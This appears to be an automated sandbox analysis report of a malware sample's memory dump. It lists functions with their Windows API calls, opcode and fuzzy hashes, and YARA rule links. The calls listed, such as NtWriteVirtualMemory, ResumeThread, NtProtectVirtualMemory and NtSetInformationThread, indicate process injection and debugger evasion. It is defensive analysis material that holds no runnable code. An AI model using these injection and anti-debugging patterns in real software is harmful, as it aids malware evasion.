                                        • API String ID: 3569954152-2679148245
                                        • Opcode ID: d13c70bbab5be5f359d3900c2f17110d08c2a55adb080a48b7f552211c20bd82
                                        • Instruction ID: 50937a42ccae5cf40852a3a7bd918c417aeeb8555542f8de04d94b4a97be6cf3
                                        • Opcode Fuzzy Hash: d13c70bbab5be5f359d3900c2f17110d08c2a55adb080a48b7f552211c20bd82
                                        • Instruction Fuzzy Hash: F121F170640789AFEFA6AF24CC90BDD3AA6EF01310F980168EF9A4A590C7394890D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9BEE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: e601f4f2bfa482d8fa8d0c9039252517bd818c665d91766a17d4280a93294320
                                        • Instruction ID: bf96c50d9c30828fd6261fa36cf0628e10fbbc2d56b2d59b8d42cfb7b395a7a1
                                        • Opcode Fuzzy Hash: e601f4f2bfa482d8fa8d0c9039252517bd818c665d91766a17d4280a93294320
                                        • Instruction Fuzzy Hash: A021D53098474DCEDFF29A2485187BC2AD55B02258F9E46CBCF920BCA5D33540CAE642
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F4A77, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrInitializeThunk.NTDLL(020F593C,?), ref: 020F5739
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: E
                                        • API String ID: 2994545307-3568589458
                                        • Opcode ID: 37fcce7d054a0573dfdb0ec89b93e79cd1a076f64e99534b8d5264cc5906fa2e
                                        • Instruction ID: 9f3057ff77bee8cffe7c95e090ffa9d494935dcb390b8de3005a045026899fbf
                                        • Opcode Fuzzy Hash: 37fcce7d054a0573dfdb0ec89b93e79cd1a076f64e99534b8d5264cc5906fa2e
                                        • Instruction Fuzzy Hash: D821026054D7C89AD772DF34891838A7FA4BF13314FA841CECAD10A893C3A58941EB87
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9D09, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 6cd2316b7517eab2a6b8bd77f1dbc14ef5157cabf40752baf895a33d3d9ed0ba
                                        • Instruction ID: 671f93e96e48449ca7b283f4b9639a1cf412677f9921cc5ae8076fa5506c652e
                                        • Opcode Fuzzy Hash: 6cd2316b7517eab2a6b8bd77f1dbc14ef5157cabf40752baf895a33d3d9ed0ba
                                        • Instruction Fuzzy Hash: EF21D540948FC85BEBE2D674491839C6FA40B1338CFEC06DECBE54F892D71A0886C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9C99, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 42dce11020ef1e7cb29ff97f4785c0fe1e644c2329c644a80f14cf627b46ba4d
                                        • Instruction ID: c83c94241f400a16808e8f3100a79b2c8b75796641433a02c3b5a07908587d2e
                                        • Opcode Fuzzy Hash: 42dce11020ef1e7cb29ff97f4785c0fe1e644c2329c644a80f14cf627b46ba4d
                                        • Instruction Fuzzy Hash: E3112721988BCD9FEBE29A7449183AC3E644F03248FEC05CFCB924B855D32504CAD702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3DE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3527976591-3568589458
                                        • Opcode ID: 1b90da29880944a3b692bab7400ceb3d0a9fecd7f22ca6f5b93e27c57e92d613
                                        • Instruction ID: 702f38a045596a678040b551832e9e6cdfb98a6309fa20e095b9cfbb9134ae0d
                                        • Opcode Fuzzy Hash: 1b90da29880944a3b692bab7400ceb3d0a9fecd7f22ca6f5b93e27c57e92d613
                                        • Instruction Fuzzy Hash: 2511DF70244B88AFEFA15F20CC907DC3EB2EF02354F9801A9EF99454E1C7390894D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9CDC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 12f503976d4ead822325a8842c14e2a3b1ef121e906371fdae30ca813fade709
                                        • Instruction ID: 57d4fe43f3a2cf2a5bd8658d0f2b165f04ec17db06feec8bcd8a8e46878fc8af
                                        • Opcode Fuzzy Hash: 12f503976d4ead822325a8842c14e2a3b1ef121e906371fdae30ca813fade709
                                        • Instruction Fuzzy Hash: B701D815588BCD9BEBE6967849183BC2E654F13248BEC06CFCF924BD54E31504C7D746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9D74, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 7ab98fbd82f439e346a34d1161e0147a9f34663410d3e7d60677ad36a66870a4
                                        • Instruction ID: 8a71a41950693dce995f1b330fe0fce157fc39295fe20643a731f74bc3cd3c34
                                        • Opcode Fuzzy Hash: 7ab98fbd82f439e346a34d1161e0147a9f34663410d3e7d60677ad36a66870a4
                                        • Instruction Fuzzy Hash: 71012B1054C7C99FEBD39A748A183AC2EA45F13648BDC01DFCF914F811F7290486D742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9DB7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 878ba306fcb1d261e3605e03dc00f84e16bab15941899e82391089d0b8d99e40
                                        • Instruction ID: 079b3b65fee59d822bc29b55dd204749fe879d00b5c2e17dc441f7e0313683d6
                                        • Opcode Fuzzy Hash: 878ba306fcb1d261e3605e03dc00f84e16bab15941899e82391089d0b8d99e40
                                        • Instruction Fuzzy Hash: DEF0C810548BCD9BEBE2D6748A183AC6E655F03288FDC05DECB960B845E71A0487C745
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F9DEB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID: E
                                        • API String ID: 947044025-3568589458
                                        • Opcode ID: 93ff1817e9bc29342255bdb093a93bd2bfa95910f0b94a5b4d03b935b29ff32a
                                        • Instruction ID: 9b29db760a5c3b63b62509e1e8de74f2990ff8feb59ef94d88f6ec829c9c07dd
                                        • Opcode Fuzzy Hash: 93ff1817e9bc29342255bdb093a93bd2bfa95910f0b94a5b4d03b935b29ff32a
                                        • Instruction Fuzzy Hash: FEF0F610448BC95FEBA3DA74491835C7E641B0324CBEC05DFCBA24B886E71A4486C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F24E2, Relevance: 2.2, APIs: 1, Instructions: 721COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 8d9140853113c22a1fdbc6fc3f9ac13871c4e3eae1ad156a004d6ef564ecdb12
                                        • Instruction ID: e2e1a758a3f73b2be116ff3be94ea010be0cca79a81276512c333a0021d93f99
                                        • Opcode Fuzzy Hash: 8d9140853113c22a1fdbc6fc3f9ac13871c4e3eae1ad156a004d6ef564ecdb12
                                        • Instruction Fuzzy Hash: 3C328B70380306EFEB949F28CD91BEA73A6FF05350F544228EF5997A80C775A885DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F2FAB, Relevance: 2.0, APIs: 1, Instructions: 466COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8a4afa3779c7c0689a9254aa26c119d17a155aca43945e588f76be09a6a4c61
                                        • Instruction ID: e1d986948b5e43f4f3da6c5efa0de9708ea72f928fc3fe72cda370802df71d73
                                        • Opcode Fuzzy Hash: a8a4afa3779c7c0689a9254aa26c119d17a155aca43945e588f76be09a6a4c61
                                        • Instruction Fuzzy Hash: 2AE14870380345AFEBE11F24CDA5BEE36A6EF01760F514169EF469B9D0D3B98884EB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F7FAA, Relevance: 1.9, APIs: 1, Instructions: 404COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f762b016c44041dc7dd7f58f124db417df264a2d4c2e7004e1a29b022d1b657
                                        • Instruction ID: 639b02345b3a707a5e168b56a2518bf819c3def939dc22c467bc93d3f784500c
                                        • Opcode Fuzzy Hash: 7f762b016c44041dc7dd7f58f124db417df264a2d4c2e7004e1a29b022d1b657
                                        • Instruction Fuzzy Hash: 8AD1277028034AAFEFE51F24CD95BEE36A2EF41360F914129EF45979D0C7B98884EB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F55B8, Relevance: 1.9, APIs: 1, Instructions: 383libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrInitializeThunk.NTDLL(020F593C,?), ref: 020F5739
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InitializeLibraryLoadThunk
                                        • String ID:
                                        • API String ID: 3353482560-0
                                        • Opcode ID: 6e72e20395e0bfcb02ce76103887f3ff2651c8c33d2967448f1ccd844992ce81
                                        • Instruction ID: 2b563b86e3250607ca9c2a5c42450a76f84de1a62c3dd5807086b23336389d3e
                                        • Opcode Fuzzy Hash: 6e72e20395e0bfcb02ce76103887f3ff2651c8c33d2967448f1ccd844992ce81
                                        • Instruction Fuzzy Hash: C5C18D70384386AFEBE15F24CD557EE3AA6EF42760F504168EF459B9D0C3B98884EB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F79FD, Relevance: 1.9, APIs: 1, Instructions: 379COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96fce7a080038404cc1d1f73119eeecd9250c86390117b181a1dc98d10f804ea
                                        • Instruction ID: c87a73cec763d006c51ffd987cd78d14ac845a8421c7581ef0d0d75e645cc607
                                        • Opcode Fuzzy Hash: 96fce7a080038404cc1d1f73119eeecd9250c86390117b181a1dc98d10f804ea
                                        • Instruction Fuzzy Hash: DEC16B70384346AFEBE11F24CC91BEE36A2EF45720F514128EF46979D0D3B98884EB45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3191, Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6746c1a96274678ae098b96f6417b12c5dcdfd50dae98081e682066456aeaf12
                                        • Instruction ID: 1026093aaaf492070cf158024bd52399e8ce75e762c756044e394eb065ce4323
                                        • Opcode Fuzzy Hash: 6746c1a96274678ae098b96f6417b12c5dcdfd50dae98081e682066456aeaf12
                                        • Instruction Fuzzy Hash: 06B127B0380385AEFBE11F24CD56BEE36A6EF41760F514129FF459B9C0C3B99884EA45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0E46, Relevance: 1.8, APIs: 1, Instructions: 257nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID:
                                        • API String ID: 1761224837-0
                                        • Opcode ID: 2b17e585093a8c1ed126d738f76d5df996ec1c76832e0630bcd7185a41a01db2
                                        • Instruction ID: bfef4c02bc4c1a19d081b3c61208ad4c644b2599cc34b3f449bcd44d7efc1f01
                                        • Opcode Fuzzy Hash: 2b17e585093a8c1ed126d738f76d5df996ec1c76832e0630bcd7185a41a01db2
                                        • Instruction Fuzzy Hash: 4C71CE30AC4305E6EFF5196448A83FE229B5F82760F64412ADF5693CC0D7AAC4C5E903
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3A46, Relevance: 1.7, APIs: 1, Instructions: 190librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID:
                                        • API String ID: 3569954152-0
                                        • Opcode ID: ccb6bf573c9d743176be1b06108edc76979765de6e117cc6f44a71149c60eed0
                                        • Instruction ID: 7f9f430f7164913b84484832435b0ad17524e7dccabc0ec61cd29478963f9051
                                        • Opcode Fuzzy Hash: ccb6bf573c9d743176be1b06108edc76979765de6e117cc6f44a71149c60eed0
                                        • Instruction Fuzzy Hash: BE51F870280389AEEFF61F24CC91BEE3666EF05364F910165FF86969D0C3B598C4E645
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3A82, Relevance: 1.7, APIs: 1, Instructions: 182librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID:
                                        • API String ID: 3569954152-0
                                        • Opcode ID: 5786c58c65a7a958cb7391360236744154da381c75de71db90fe0c4f68186e66
                                        • Instruction ID: 0a37eaeecab11f918ed8243311ce39b274c62abdf567ba530a65101e84aa1b96
                                        • Opcode Fuzzy Hash: 5786c58c65a7a958cb7391360236744154da381c75de71db90fe0c4f68186e66
                                        • Instruction Fuzzy Hash: CF510A70280389AEEFF61F24CC917EE3666EF05364F910165FF46965D0C7B598C4E641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3B08, Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e491713655893190f9627b91ce26a55be8f7595d9829377b31b34c4e67f59d0
                                        • Instruction ID: 21cdf54a167496cd7ab6edbdc906934f5f3011f6928c79cf173ac7b1e290ffb1
                                        • Opcode Fuzzy Hash: 3e491713655893190f9627b91ce26a55be8f7595d9829377b31b34c4e67f59d0
                                        • Instruction Fuzzy Hash: A0510670280389AEEFF62F24CC91BED36A6EF05324F910165FF86969D0C7B598C4E641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F97D3, Relevance: 1.6, APIs: 1, Instructions: 141nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: b26a1020e64325006d20705599c258d68cab1b17864319927799676f27aa2ac2
                                        • Instruction ID: 2d86274f073d6a9f89ed2cf61d18d3dd134da1fa9c651df75423df55cdd3ee87
                                        • Opcode Fuzzy Hash: b26a1020e64325006d20705599c258d68cab1b17864319927799676f27aa2ac2
                                        • Instruction Fuzzy Hash: 2541B331AC870DCEDFE55E688A587FC22D19B42354F9A465BCF5387C94D33540CAE682
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3BCE, Relevance: 1.6, APIs: 1, Instructions: 140librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID:
                                        • API String ID: 3569954152-0
                                        • Opcode ID: ceef34843db3667c1ae158c018731663dc661e6e017543aecbcffbff714e5fd6
                                        • Instruction ID: 4b6ed3c759b78b7ac36382379530af97d7886728226d5ed7dad33cfad7c0a090
                                        • Opcode Fuzzy Hash: ceef34843db3667c1ae158c018731663dc661e6e017543aecbcffbff714e5fd6
                                        • Instruction Fuzzy Hash: 5941F470280389AEEFF62F24CC917ED36A6EF04364F914164FF46965D0C3B598C8E641
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F988A, Relevance: 1.6, APIs: 1, Instructions: 126nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: ede2484413c029e6cbbdc08fd777c44fd9c2e19893607fd0af3373e0484796fe
                                        • Instruction ID: aa751a3bd7c8e5cc39f491aa563fb4fdc85771797956a9f570144cb8214415ef
                                        • Opcode Fuzzy Hash: ede2484413c029e6cbbdc08fd777c44fd9c2e19893607fd0af3373e0484796fe
                                        • Instruction Fuzzy Hash: 0841B030AC870DDEEFE54A6889687FC62D19F41224F9A465BCF5387C94D33584C6EA82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F11F6, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ffbe96b449583a8b329aa64184742e49ce3c136bf7bb7a44376375fb45a8eb9
                                        • Instruction ID: 5eb2694cd8fbb6c1f464ab23784d3a061b0c8d1d200e319177e0a42861975a6a
                                        • Opcode Fuzzy Hash: 6ffbe96b449583a8b329aa64184742e49ce3c136bf7bb7a44376375fb45a8eb9
                                        • Instruction Fuzzy Hash: 683169309C4345E6EBF519288DA83FF62972F82760F248319DF6A57DC0D76AC489A912
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F91CF, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020F8B7B,00000040,020F09FC,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 020F91E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectVirtual
                                        • String ID:
                                        • API String ID: 2706961497-0
                                        • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                        • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                        • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                        • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F128E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadProcessTerminate
                                        • String ID: E
                                        • API String ID: 3349790660-3568589458
                                        • Opcode ID: c03861f55a8de68a555a9e5d29a2e0f2049a792efafaa0e0f1e65c1f57930612
                                        • Instruction ID: b35f291864eab9928b00a795191560f0aa30bf17baa4a2c501b2934c6923b264
                                        • Opcode Fuzzy Hash: c03861f55a8de68a555a9e5d29a2e0f2049a792efafaa0e0f1e65c1f57930612
                                        • Instruction Fuzzy Hash: E13100209887C0E7EBA29A248C183EE6A971F03360F6C425DCFA917CC1C75B9849D602
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6ECA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 7c4a0b2c051dc48806b5b9f122e7d7672b90a327addeb28ad00dd714bc057e1f
                                        • Instruction ID: c060ce4aefb2db54f2a10eafcf4de47f46e9e6826936d412a849f3c0380a3b09
                                        • Opcode Fuzzy Hash: 7c4a0b2c051dc48806b5b9f122e7d7672b90a327addeb28ad00dd714bc057e1f
                                        • Instruction Fuzzy Hash: 91313A91888BC49BEBE195304D5479DAFA81F03388FAC01EECB964BD52DB194946D743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F12E2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: 80db15f7a3c779f960d7fed71d627b5197efbe478da4b5e70bb4c49b8f185914
                                        • Instruction ID: e9fc884673b66a3e264413972b3c569912c3b06f4a3a6fa5641f114dfc32e4c8
                                        • Opcode Fuzzy Hash: 80db15f7a3c779f960d7fed71d627b5197efbe478da4b5e70bb4c49b8f185914
                                        • Instruction Fuzzy Hash: 6521BE604C87C0E7EFB29A244C187ED7EA61F03364F6C426ECFA95ACC1C75E9449DA02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6DEC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 7d505802774598d102362cd57e692fd0ab7f5bab6514fc1491d18d8dd0ef9a90
                                        • Instruction ID: d8c4700d1d01911b973e53267a07c126aee9bbb8cbe7a162ac2bee5637e2aac5
                                        • Opcode Fuzzy Hash: 7d505802774598d102362cd57e692fd0ab7f5bab6514fc1491d18d8dd0ef9a90
                                        • Instruction Fuzzy Hash: 9D11C0804CC784EBEFF151204C647FE99580F02390F68015BDFA707D22D7094588F643
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F132E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: d07221f4756de9c01410d8fdfff83f3304bc4cd73d8d88945e73f7902522c21e
                                        • Instruction ID: 553616a4d3d8a2ae3c49e9a9bfa2275cbb5c1f361f2f7fbdda515ee5ebc7b79d
                                        • Opcode Fuzzy Hash: d07221f4756de9c01410d8fdfff83f3304bc4cd73d8d88945e73f7902522c21e
                                        • Instruction Fuzzy Hash: 4E21D0304C87C1E7EFF19A284C183EE7E9A1F03364F5C425ECBA956CC1C75A94899A13
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F6E20, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
